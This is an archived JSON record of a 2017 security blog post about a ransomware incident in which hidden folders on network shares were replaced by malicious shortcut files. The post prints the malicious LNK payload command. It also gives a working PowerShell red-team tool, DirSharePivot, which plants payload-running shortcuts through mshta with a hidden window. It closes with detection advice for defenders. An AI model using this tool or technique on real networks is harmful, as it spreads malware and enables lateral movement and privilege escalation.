{
	"id": "a44fa548-f1c3-4263-ae16-258621fb0f72",
	"created_at": "2026-04-06T02:12:06.533981Z",
	"updated_at": "2026-04-10T13:11:28.854073Z",
	"deleted_at": null,
	"sha1_hash": "a65f1ff4c9383496e7609c1977d1aa48a8e33be0",
	"title": "Abusing network shares for efficient lateral movements and privesc (DirSharePivot)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85906,
	"plain_text": "Abusing network shares for efficient lateral movements and\r\nprivesc (DirSharePivot)\r\nBy David Routin\r\nPublished: 2017-11-14 · Archived: 2026-04-06 01:54:48 UTC\r\nBackground\r\nAbout a year ago my team and I had were called to perform a forensic analysis on a customer network. The reason\r\nfor this was that a computer was first infected by a ransomware, and for some (unknown) reasons, several other\r\nworkstations were getting \"infected\" after only 3 hours.\r\nAfter 5 hours (time of my intervention) I discovered that:\r\n- 80% of the workstations were infected\r\n- The network was partially segmented but the infection occurs on all segments\r\n- A malware process was even running on the file Server as... \"Domain Administrator\" :-/\r\n- No track of 4624 (Logon Type 3) events or any other track of lateral movements/authentications\r\nInteresting... hum :)\r\nIn this article I will describe my analysis of the threat and also how to take advantage of this method in a \"safer\"\r\nand more \"controlled\" way to  move laterally (or even perform privesc) in red team operations. (practical\r\nexploitation code will be provided).\r\nThis method may be particularly useful in segmented/restricted networks and could be used to circumvent SIEM\r\ndetections based on network flows \u0026 Windows authentication events only use cases.\r\nI will also suggest some blue team possibilities to catch this kind of attacks.\r\nNice read :)\r\nLateral movement abusing user interactions\r\nAfter finding the \"patient 0\", I finally see something weird on the main network shares:\r\nPartial screenshot of network share with \"supposed\" directories links\r\nThis looks interesting... I asked some employees and they told me that these links were legits and that when they\r\nclick on them they access the normal contents without issue... 
(furthermore DFS can present shares that look like\r\nLNK/shortcuts).\r\nBut I decided to analyze this...\r\nhttps://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html\r\nPage 1 of 5\n\nA \"dir -Force\" output in the network share returns the following result, showing the very interesting way used to\r\nhide the threat:\r\n- Original directories are set to \"Hidden\" (-h-),\r\n- from there a LNK is created with the original directory name\r\ndir -Force in the current share\r\nLNK File analysis\r\nAn analysis of one of the .LNK files confirmed that:\r\n- a malicious payload is embedded\r\n- The LNK uses a \"Directory\" icon (Shell32.dll, Icon index: 3)\r\nMalicious payload:\r\n.\\Windows\\system32\\cmd.exe /c start explorer.exe \"Intel\" \u0026 type \"3b5a5b29263677d600.exe\" \u003e \"%temp%\\3b5a5b292636\r\n\"%temp%\\3b5a5b29263677d600.exe\"\r\nWhat does it mean?\r\nWhen a user clicks on any \"fake directory\":\r\n- An explorer window is opened to access the \"real\" (hidden) directory, making the user think everything is legit\r\nthanks to explorer.exe \"Intel\"\r\n- The malware is copied onto the victim's machine (in %temp%)\r\n- The malware is finally executed locally!\r\n- Once activated, the malware tries to infect all other accessible shares from this new victim\r\n- At the end we have a \"continuously\" improved lateral movement over the whole network thanks to users' actions\r\n(network share access)!\r\nIn a few minutes/hours the whole network may become infected, depending on the volume of access to the network\r\nshare.\r\nBenefits for the attacker\r\nThis lateral movement technique is:\r\n- Particularly efficient (a whole domain may be compromised in a few hours)\r\n- Privilege escalation possible! 
Indeed, everyone is using network shares in a company, so you are likely to get\r\nmore and more accounts and privileges; in this case, even a logged-in Domain Admin had used the network\r\nshare and compromised their account!\r\n- Network segmentation is not a problem for attackers as the spreading point is a network share\r\n- Likely not detected by IDS/SIEM as it doesn't trigger any authentication attempts or network scanning from a\r\nsingle host\r\nUsing this technique in Red Team operations\r\nAs shown previously this technique may be of great interest when standard privesc/lateral movement techniques fail\r\n(high patch level, strong segmentation, etc.) during red team engagements.\r\nFor this usage it would be very dangerous to pwn users, which would infect all their accessible shares, etc.\r\n(cleaning that up at the end of the engagement may be a pain :D)\r\nIn this context I have developed the following PowerShell code to limit this effect to a specific directory only.\r\nFurthermore, the original method was noisy and not optimized:\r\n- \"cmd /c\" was noisy as it briefly flashed a console window...\r\n- the payload was written to disk (we are in 2017 :) )\r\nTo get rid of this I have used an mshta command line running cmd (this is not mandatory, as everything could be done\r\nusing VBScript) with the \"vbhide\" option to hide any possible window; detection is also limited by an in-memory\r\npayload (no payload written to disk).\r\nfunction DirSharePivot\r\n{\r\n \u003c#\r\n .SYNOPSIS\r\n Function: DirSharePivot\r\n Author: David ROUTIN - 13 nov 2017\r\nExample:\r\n DirSharePivot -StartDir K:\\test -Payload \"powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX\"\r\n This will set all the directories in the defined Path as Hidden (non recursive to keep control), aft\r\n name of each hidden directories.\r\n This LNK will have a \"directory shortcut icon\", and will open an explorer 
to the selected directory w\r\n #\u003e\r\n [CmdletBinding()] Param(\r\n \r\n [Parameter(Position = 0, Mandatory = $True)]\r\n [String]\r\n $StartDir,\r\n [Parameter(Position = 1, Mandatory = $True)]\r\n [String]\r\n $Payload\r\n \r\n )\r\n $Filepath = Get-ChildItem -path $StartDir -Force -directory\r\n foreach ( $Object in $Filepath ) {\r\n $Object.Attributes = (-join \"uRtHoirdebn\"[3,5,7,7,8,10])\r\n \r\n $Shell = New-Object -ComObject (\"WScript.Shell\")\r\n $ShortCut = $Shell.CreateShortcut($StartDir + \"\\\" + $Object + \".lnk\")\r\n $ShortCut.TargetPath=\"mshta.exe\"\r\n $ShortCut.Arguments= 'vbscript:Close(Execute(\"Set x = CreateObject(\"\"WScript.shell\"\"): x.Run \"\"cmd /\r\n $ShortCut.WindowStyle = 1;\r\n $ShortCut.Hotkey = \"CTRL+SHIFT+F\";\r\n $ShortCut.IconLocation = \"C:\\windows\\System32\\shell32.dll, 3\";\r\n $ShortCut.Description = $Object;\r\n $ShortCut.Save()\r\n }\r\n}\r\nBlue team actions\r\nEven if not perfect, several tactics may be deployed to detect/protect against this spreading method.\r\n- Audit process tracking and create use cases based on the usage of sensitive MS-signed binaries (mshta, powershell,\r\nrundll32...)\r\n- Actively monitor PowerShell executions\r\n- Properly control write permissions on the main directories of your share\r\n- Use AppLocker to limit the risk of unnecessary usage of MS-signed binaries.\r\n- Activate \"Audit Object Access\" and monitor sensitive shares or parts of them (as enabling this on a high-volume\r\ncorporate share may have negative performance impacts) to detect specific .LNK files.\r\nFor example, if you have a \"Honeypot\" directory, you may track creation of \"Honeypot.lnk\" (event 4656)\r\n- Create a SIEM rule to monitor multiple .LNK file creations on shares (monitoring events 5145 may be an option at\r\nthe file server level)\r\nDavid Routin\r\nSource: 
https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html"
	],
	"report_names": [
		"abusing-user-shares-for-efficient.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775441526,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.pdf",
		"text": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.txt",
		"img": "https://archive.orkl.eu/a65f1ff4c9383496e7609c1977d1aa48a8e33be0.jpg"
	}
}